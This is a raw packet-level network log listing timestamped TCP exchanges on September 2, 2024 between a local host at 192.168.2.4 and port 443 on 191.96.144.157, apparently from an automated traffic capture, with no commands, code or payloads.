Sep 2, 2024 11:42:54.872179031 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872183084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872226000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872229099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872236967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872266054 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872271061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872287989 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872293949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872309923 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872342110 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872344971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872384071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.876183987 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.876216888 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281135082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281188011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281217098 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281219959 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281234980 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281253099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281253099 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281280994 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281285048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281292915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281296015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281327009 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281331062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281341076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281387091 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281390905 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281434059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281466961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281498909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281513929 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281517982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281528950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281542063 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281558990 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281562090 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281569004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281596899 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281599045 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281625032 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281627893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281650066 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281711102 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281747103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281757116 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281759977 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281780958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281789064 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281825066 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281827927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281871080 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281899929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281941891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.281948090 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.281977892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282001972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282005072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282013893 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282032013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282063961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282077074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282079935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282109022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282246113 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282279015 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282308102 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282310963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282319069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282339096 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282351971 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282355070 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282362938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282392979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282396078 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282399893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282434940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282438040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282442093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282468081 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282479048 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282481909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282516956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282551050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282584906 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282596111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282598972 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282613993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282624960 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282664061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282664061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282668114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282715082 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282720089 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282748938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282768011 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282771111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282782078 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282797098 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282815933 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.282819033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282968044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.282998085 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283013105 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283016920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283030987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283046961 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283066034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283082962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283086061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283101082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283113956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283137083 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283149004 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283153057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283184052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283287048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283320904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283333063 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283335924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283355951 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283370972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283375025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283390999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283402920 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283415079 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283416986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283423901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283447981 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283453941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283474922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283478975 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283490896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283499956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283520937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283536911 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283540964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283567905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283687115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283725023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283730030 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283770084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283868074 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283901930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283917904 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283921003 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283937931 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283945084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283960104 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.283962965 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283970118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.283992052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284006119 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284023046 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284025908 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284039021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284049988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284065962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284090042 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284092903 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284106016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284113884 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284138918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284154892 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284158945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284181118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284185886 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284218073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284229994 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284233093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284251928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284265041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284285069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284303904 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284307957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284315109 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284334898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284352064 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284356117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284398079 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284636974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284670115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284684896 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284687996 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284698963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284715891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284729004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284734964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284738064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284749985 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284773111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284774065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284780025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284811020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284818888 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284821987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284838915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284851074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284862995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284866095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284878016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284898043 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284919977 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284926891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284930944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284953117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.284964085 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.284986019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285001040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285003901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285011053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285037041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285042048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285057068 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285059929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285074949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285095930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285115004 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285118103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285156965 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285474062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285511017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285523891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285527945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285546064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285558939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285573006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285574913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285583019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285602093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285614014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285635948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285640001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285646915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285649061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285679102 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285695076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285698891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285715103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285725117 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285751104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285762072 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285764933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285785913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285799026 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285803080 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285820007 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285828114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285840988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285844088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285851955 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285873890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285885096 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285906076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285908937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285917044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285931110 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285940886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285952091 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.285954952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.285985947 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286319971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286351919 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286375046 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286377907 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286386013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286406040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286412954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286429882 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286432981 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286448956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286458969 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286499023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286501884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286541939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286588907 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286631107 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286694050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286725044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286730051 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286734104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286752939 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286778927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286782980 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286808014 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286820889 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286921978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286953926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286977053 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.286979914 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.286988020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287003040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287019968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287029982 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287034035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287065983 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287082911 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287211895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287244081 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287272930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287307024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287318945 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287322998 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287343979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287375927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287375927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287384987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287395000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287411928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287422895 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287425995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287451029 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287456036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287493944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287497997 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287501097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287527084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287545919 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287549019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287574053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287575006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287590027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287592888 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287609100 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287623882 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287645102 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287671089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287673950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287683010 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287731886 CEST	49763	443	192.168.2.4	191.96.144.157
